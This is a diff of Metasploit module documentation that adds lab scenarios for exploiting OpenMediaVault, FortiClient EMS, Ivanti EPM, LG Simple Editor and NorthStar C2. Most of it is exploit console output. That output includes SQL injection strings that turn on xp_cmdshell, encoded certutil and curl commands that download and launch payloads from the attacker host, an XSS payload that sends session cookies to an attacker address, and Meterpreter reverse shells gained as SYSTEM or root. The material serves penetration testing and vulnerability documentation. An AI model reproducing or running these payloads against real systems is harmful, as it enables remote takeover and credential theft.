+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target appears to be vulnerable. Version 7.3.0.pre.5
+[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/DdVzoLQugqto82
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Client 192.168.201.10 (Wget/1.21.4) requested /DdVzoLQugqto82
+[*] Sending payload to 192.168.201.10 (Wget/1.21.4)
+[+] Cron payload entry successfully removed.
+[*] Meterpreter session 9 opened (192.168.201.8:4444 -> 192.168.201.10:36792) at 2024-07-01 20:22:02 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+## Limitations
+Ensure that your `WfsDelay` advanced option is set to more then 60 seconds to allow `cron` to execute the payload.
@@ -71,7 +71,7 @@ and download and install the .msi package. Once installed correctly you should s
 1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`

 ## Scenarios
-### FortiClient EMS 7.07.0398_x64 running on Windows Server 2019 (Domain Controller)
+### FortiClientEndpointManagementServer_7.0.7.0398_x64.exe running on Windows Server 2019 (Domain Controller)
 ```
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
 rhosts => 172.16.199.200
@@ -101,7 +101,7 @@ Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
-   LPORT               8383             yes       The listen port
+   LPORT               4444             yes       The listen port


 Exploit target:
@@ -114,32 +114,156 @@ Exploit target:

 View the full module info with the info, or info -d command.

-msf6 exploit(windows/http/forticlient_ems_fctid_sqli) >
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
+verbose => true
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
 [*] Reloading module...

-[*] Started reverse TCP handler on 172.16.199.1:8383
+[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\pzGnmDqDGUOb.exe & start /B %TEMP%\pzGnmDqDGUOb.exe
+[*] Fetch handler listening on 172.16.199.1:8080
+[*] HTTP server started
+[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
+[*] Started reverse TCP handler on 172.16.199.1:4444
 [*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
-[+] 172.16.199.200:8013 - The target is vulnerable. The SQLi has been exploited successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
+SIZE=    124
+X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
+X-FCCK-PROBE-END
+
+
+[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
+
+[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.0.7
+[*] 172.16.199.200:8013 - Returning SYSINFO for 7.0 target
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;--
+SIZE=     1900
+
+X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjA4NzkKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9QjRGNDQ1MEQtMTA4NS00RUIyLTkzMzItRkNCMDVFNzExRDE3Ck5XSUZTPUV0aGVybmV0MHwyMC4xNTQuOS40fGM0OmZjOjEyOmIzOjI3OmVmfDIxOS4xMDIuMzYuMjIwfGExOjhjOmJjOjBjOjJmOmE5fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTMwLTUwLTAtNTAwCkdST1VQX1RBRz0KQURHVUlEPQpFUF9GR1RDSEtTVU09MApFUF9SVUxFQ0hLU1VNPTAKV0ZfRklMRVNDSEtTVU09MApFUF9BUFBDVFJMQ0hLU1VNPTAK
+
+X-FCCK-REGISTER-END
+
+
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
 [*] Sending stage (201798 bytes) to 172.16.199.200
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75
-726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025
-54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
-[*] Meterpreter session 8 opened (172.16.199.1:8383 -> 172.16.199.200:57847) at 2024-04-11 14:00:22 -0700
+[*] 172.16.199.200:8013 - The response received was:
+[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.200:50409) at 2024-07-24 09:35:07 -0700

 meterpreter > getuid
-syServer username: NT AUTHORITY\SYSTEM
+Server username: NT AUTHORITY\SYSTEM
 meterpreter > sysinfo
 Computer        : DC2
 OS              : Windows Server 2019 (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
 Domain          : KERBEROS
-Logged On Users : 16
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
+```
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
+verbose => true
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options
+
+Module options (exploit/windows/http/forticlient_ems_fctid_sqli):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   8013             yes       The target port (TCP)
+   VHOST                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      rixdOwaGgW       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
+
+[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\xqUdZSzoE.exe & start /B %TEMP%\xqUdZSzoE.exe
+[*] Fetch handler listening on 172.16.199.1:8080
+[*] HTTP server started
+[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
+SIZE=    124
+X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
+X-FCCK-PROBE-END
+
+
+[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000127184:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
+
+[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.2.2
+[*] 172.16.199.200:8013 - Returning SYSINFO for 7.2 target
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';--
+IP=172.16.199.151
+MAC=00-0c-29-51-f7-4d
+FCT_ONNET=0
+CAPS=131071
+VDOM=Default
+EC_QUARANTINED=0
+SIZE=     2259
+
+X-FCCK-REGISTER:SYSINFO|RkNUT1M9V0lONjQKT1NWRVI9TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvZmVzc2lvbmFsIEVkaXRpb24sIDY0LWJpdCAoYnVpbGQgMTkwNDUpClJTRU5HX1ZFUj0xLjAwMTgyCkNPTV9NT0RFTD1WTXdhcmU3LDEKQVZTSUdfVkVSPTEuMDAwMDAKVVRDPTE3MjE3NTY2MjYKUENfRE9NQUlOPWtlcmJlcm9zLmlzc3VlCkNPTV9NQU49Vk13YXJlLCBJbmMuCkNQVT1JbnRlbChSKSBDb3JlKFRNKSBpNy05NzUwSCBDUFUgQCAyLjYwR0h6CkNPTV9TTj1WTXdhcmUtNTYgNGQgOGEgZDUgN2IgMzkgM2IgMGQtMzMgYzYgMjUgNmEgZTQgNTEgZjcgNGQKREhDUF9TRVJWRVI9Tm9uZQpGQ1RWRVI9Ny4yLjIuMDg2NApFUF9PTk5FVENIS1NVTT0wCkFWRU5HX1ZFUj02LjAwMjg3CkFQUFNJR19WRVI9MjguMDA4MzEKVVNFUj1tc2Z1c2VyCkFQUEVOR19WRVI9NC4wMDA4MgpWVUxTSUdfVkVSPTEuMDA3MDgKQVZBTFNJR19WRVI9MC4wMDAwMApWVUxFTkdfVkVSPTIuMDAwMzcKQVZfUFJPVEVDVEVEPTEKQVZBTEVOR19WRVI9MC4wMDAwMApQRUVSX0lQPTE2Mi4xNTYuNTguMTk5CkVOQUJMRURfRkVBVFVSRV9CSVRNQVA9MTYKRVBfT0ZGTkVUQ0hLU1VNPTAKSU5TVEFMTEVEX0ZFQVRVUkVfQklUTUFQPTQyMDcyNwpFUF9DSEtTVU09MApISURERU5fRkVBVFVSRV9CSVRNQVA9NDE4MDg3CkdST1VQX1RBRz0KRU5BQkxFRF9BUFBTPTAKSU5TVEFMTEVEX0FQUFM9MApESVNLRU5DPQpIT1NUTkFNRT1jbGllbnQKQVZfUFJPRFVDVD1NaWNyb3NvZnQgRGVmZW5kZXIgQW50aXZpcnVzCkZDVF9TTj1GQ1Q4MDAzMTczNjg5NzMwCklOU1RBTExVSUQ9RjQxNkU5QjctQzAxQy00M0RFLTk1RjEtMkJGQ0FEOTAzNTFECk5XSUZTPUV0aGVybmV0MHwxNzIuMTYuMTk5LjE1MXwwMC0wYy0yOS01MS1mNy00ZHwxNzIuMTYuMTk5LjJ8MDAtNTAtNTYtZTgtMDgtNmF8MXwqfDAKTUVNPTE2MzgzCkhERD0xMTkKRE9NQUlOPQpXT1JLR1JPVVA9ClVTRVJfU0lEPVMtMS01LTIxLTE3NjAyNTQxOTEtMzcyMzY0MzQyLTMyNDQ0NTM2ODctMTAwMApBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=|
+
+X-FCCK-REGISTER-END
+
+
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 172.16.199.200
+[*] 172.16.199.200:8013 - The response received was:
+[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';-- was executed successfully
+[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.200:28146) at 2024-07-23 16:17:56 -0700
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC2
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 9
 Meterpreter     : x64/windows
 meterpreter >
 ```
@@ -0,0 +1,57 @@
+## Vulnerable Application
+
+Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to
+unauthenticated SQL injection which can be leveraged to achieve unauthenticated
+remote code execution.
+
+### Installation
+Download and run the installer of a vulnerable version of Ivanti Endpoint
+Manager (EPM) from https://www.ivanti.com/resources/downloads. Note that a
+service account with Ivanti is required.
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use windows/http/ivanti_epm_recordgoodapp_sqli_rce`
+1. Do: `exploit rhost=<remote host>`
+1. You should get a session.
+
+## Options
+
+### DELAY
+The delay to detect if the target is vulnerable using time-based SQLi in second (default: 5)
+
+## Scenarios
+
+This has been tested against EPM version 2021.1 and 2022 (no Service Update) on Windows Server 2019
+```
+msf6 exploit(windows/http/ivanti_epm_recordgoodapp_sqli_rce) > exploit verbose=true rhosts=192.168.101.130
+
+[*] Command to run on remote host: certutil -urlcache -f http://192.168.101.40:8080/GgcI9uEq8wim98SvWzx8DQ %TEMP%\TXnDFJhrK.exe & start /B %TEMP%\TXnDFJhrK.exe
+[*] Fetch handler listening on 192.168.101.40:8080
+[*] HTTP server started
+[*] Adding resource /GgcI9uEq8wim98SvWzx8DQ
+[*] Started reverse TCP handler on 192.168.101.40:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if the target is vulnerable using time-based SQLi (delay=5
+[*] Baseline query elapsed time: 0.5334880000445992
+[*] Delayed query elapsed time: 5.020284999860451
+[+] The target is vulnerable. SQLi executed
+[*] Client 192.168.101.40 requested /GgcI9uEq8wim98SvWzx8DQ
+[*] Sending payload to 192.168.101.40 (Microsoft-CryptoAPI/10.0)
+[*] Client 192.168.101.40 requested /GgcI9uEq8wim98SvWzx8DQ
+[*] Sending payload to 192.168.101.40 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 192.168.101.40
+[*] Meterpreter session 1 opened (192.168.101.40:4444 -> 192.168.101.40:64423) at 2024-06-20 10:50:21 +0200
+
+meterpreter > getuid
+Server username: NT Service\MSSQL$LDMSDATA
+meterpreter > sysinfo
+Computer        : WIN2019
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in LG Simple Editor <= v3.21.0 (CVE-2023-40504).
+
+An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
+`NT AUTHORITY\SYSTEM`.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://www.lg.com/us/business/display-solutions/supersign-w-lite/downloads/LGSimpleEditor_setup_v3_21_0.exe.zip).
+The vulnerable application runs on Apache Tomcat 7, which listens by default on TCP port 8080.
+
+**Successfully tested on**
+
+- LG Simple Editor v3.21.0 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > use exploit/windows/http/lg_simple_editor_rce_uploadvideo 
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > set RHOSTS <IP>
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against LG Simple Editor v3.21.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar
+to the following:
+
+```
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > exploit 
+
+[*] Command to run on remote host: curl -so %TEMP%\ELizAMEog.exe http://192.168.137.190:8080/Ufbk8y1KXtCzmtyya8K7Jg & start /B
+%TEMP%\ELizAMEog.exe
+[*] Fetch handler listening on 192.168.137.190:8080
+[*] HTTP server started
+[*] Adding resource /Ufbk8y1KXtCzmtyya8K7Jg
+[*] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 3.21.0
+[*] Sending command injection...
+[*] Using random filename: JyQig.mp4
+[*] Client 192.168.137.196 requested /Ufbk8y1KXtCzmtyya8K7Jg
+[*] Sending payload to 192.168.137.196 (curl/8.7.1)
+[*] Sending stage (201798 bytes) to 192.168.137.196
+[+] Command injection sent.
+[*] Exploit finished, check thy shell.
+[*] Meterpreter session 67 opened (192.168.137.190:4444 -> 192.168.137.196:50129) at 2024-08-06 23:16:30 -0400
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-1FD5QG3
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+NorthStar C2, prior to commit `7674a44` on March 11 2024, contains a vulnerability where the logs page is
+vulnerable to a stored XSS.
+An unauthenticated user can simulate an agent registration to cause the XSS and take over a user's session.
+With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts
+(agents), and kill the original agent.
+
+Successfully tested against NorthStar C2 commit `e7fdce148b6a81516e8aa5e5e037acd082611f73` running on
+Ubuntu 22.04. The agent was running on Windows 10 19045.
+
+```mermaid
+flowchart TD
+    A(fa:fa-computer Metasploit)
+    B(fa:fa-server NorthStar C2)
+    C(fa:fa-person Northstar C2 User)
+    D(fa:fa-bug Agent)
+    A -->|1. Upload XSS| B
+    B -...-> C
+    C -->|2. Visit XSS Page| B
+    C -->|3. Send cookie| A
+    A -->|4. Using Cookie, takeover agents| B
+    D -->|5. Fetch and run payload, kill agent| A
+    D -...-> B
+    B -...-> D
+```
+
+### Install NorthStar C2
+
+Instructions for Ubuntu 22.04. Official documentation and manual installation steps can be found [here](https://github.com/EnginDemirbilek/NorthStarC2/wiki/Installation).
+
+```
+sudo apt-get update
+sudo apt-get install -y software-properties-common git wget mysql-server
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+sudo service mysql start
+git clone https://github.com/EnginDemirbilek/NorthStarC2.git
+cd NorthStarC2
+git checkout e7fdce148b6a81516e8aa5e5e037acd082611f73
+chmod +x install.sh
+sudo ./install.sh # mysql answers: root:<empty>, make sure to give a website username/password
+sudo apt-get purge -y php
+sudo apt autoremove -y
+sudo apt-get install -y php7.2 libapache2-mod-php7.2 php7.2-mysql
+sudo a2dismod php*
+sudo a2enmod php7.2
+sudo service apache2 restart
+```
+
+### Agent Install
+
+This should be done on a Windows computer:
+
+On the c2 payload, you'll want to edit `Program.cs` on line 13 and edit `mainUri` to your northstar IP.
+Now run the program, or compile and run it, and ensure the agent is active on the NorthStar C2 website.
+
+## Verification Steps
+
+1. Install the application, and connect an agent
+1. Start msfconsole
+1. Do: `use exploit/windows/http/northstar_c2_xss_to_agent_rce`
+1. Do: `set rhosts [ip]`
+1. Do: `set srvhost [srvhost]`
+1. Do: `set fetch_srvport [fetch_srvport]`
+1. Do: `set fetch_srvhost [fetch_srvhost]`
+1. Do: `run`
+1. Do: visit the NorthStarC2 site with a logged in user, and browse to the Server Logs page.
+1. You should get a shell on each agent.
+
+## Options
+
+### KILL
+
+If the NorthStarC2 agent should be explicitly killed on each compromised host. Defaults to `false`
+
+## Scenarios
+
+### NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 on Ubuntu 22.04 with an agent on Windows 10
+
+```
+resource (northstar.rq)> use exploit/windows/http/northstar_c2_xss_to_agent_rce
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+resource (northstar.rq)> set rhosts 4.4.4.4
+rhosts => 4.4.4.4
+resource (northstar.rq)> set srvhost 3.3.3.3
+srvhost => 3.3.3.3
+resource (northstar.rq)> set verbose true
+verbose => true
+resource (northstar.rq)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (northstar.rq)> set FETCH_srvhost 3.3.3.3
+FETCH_srvhost => 3.3.3.3
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > exploit
+[*] Command to run on remote host: certutil -urlcache -f http://3.3.3.3:9090/p3icRkNmQwbsIs7RYzV5sA %TEMP%\tKvCAnUBZgfn.exe & start /B %TEMP%\tKvCAnUBZgfn.exe
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) >
+[*] Fetch handler listening on 3.3.3.3:9090
+[*] HTTP server started
+[*] Adding resource /p3icRkNmQwbsIs7RYzV5sA
+[*] Started reverse TCP handler on 3.3.3.3:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. NorthStar Login page detected
+[*] Sending XSS
+[*] Sending: N*/</script><q
+[*] Sending: N*/i.src=u/*q
+[*] Sending: N*/new Image;/*q
+[*] Sending: N*/var i=/*q
+[*] Sending: N*/s+h+p+'/'+c;/*q
+[*] Sending: N*/var u=/*q
+[*] Sending: N*/'http://';/*q
+[*] Sending: N*/var s=/*q
+[*] Sending: N*/':8080';/*q
+[*] Sending: N*/var p=/*q
+[*] Sending: N*/a+b;/*q
+[*] Sending: N*/var h=/*q
+[*] Sending: N*/'.10.147';/*q
+[*] Sending: N*/var b=/*q
+[*] Sending: N*/'192.168';/*q
+[*] Sending: N*/var a=/*q
+[*] Sending: N*/d.cookie;/*q
+[*] Sending: N*/var c=/*q
+[*] Sending: N*/document;/*q
+[*] Sending: N*/var d=/*q
+[*] Sending: N</td><script>/*q
+[*] Waiting on XSS execution
+[*] Using URL: http://3.3.3.3:8080/
+[*] Server started.
+```
+
+Now visit the site with a logged in user, and browse to the Server Logs page.
+
+```
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce - Received GET request.
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - Received cookie: st0sfhqto9mqtpd81rlg6hq5g5
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - Live Agents
+===========
+ ID                   IP              OS                      Username                Hostname         Status
+ --                   --              --                      --------                --------         ------
+ NC1S7X834eJVcJtynrq  222.222.22.222  Windows 10 Enterprise   DESKTOP-Q0HUOEI\h00die  DESKTOP-Q0HUOEI  Online
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - CSRF Token: 38b4d324e8cd233b7a94c62e7b3c5556
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Stealing DESKTOP-Q0HUOEI
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce -   (NC1S7X834eJVcJtynrq) Enabling shell mode
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce -     Command sent successfully to agent NC1S7X834eJVcJtynrq, response: Cmd mode enabled, all commands will be redirect to CMD. Response delay is : 2000 miliseconds
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce -   (NC1S7X834eJVcJtynrq) Running payload
+[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
+[*] Sending payload to 222.222.22.222 (Microsoft-CryptoAPI/10.0)
+[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
+[*] Sending payload to 222.222.22.222 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 222.222.22.222
+[*] Meterpreter session 1 opened (3.3.3.3:4444 -> 222.222.22.222:50116) at 2024-04-10 14:40:31 +0000
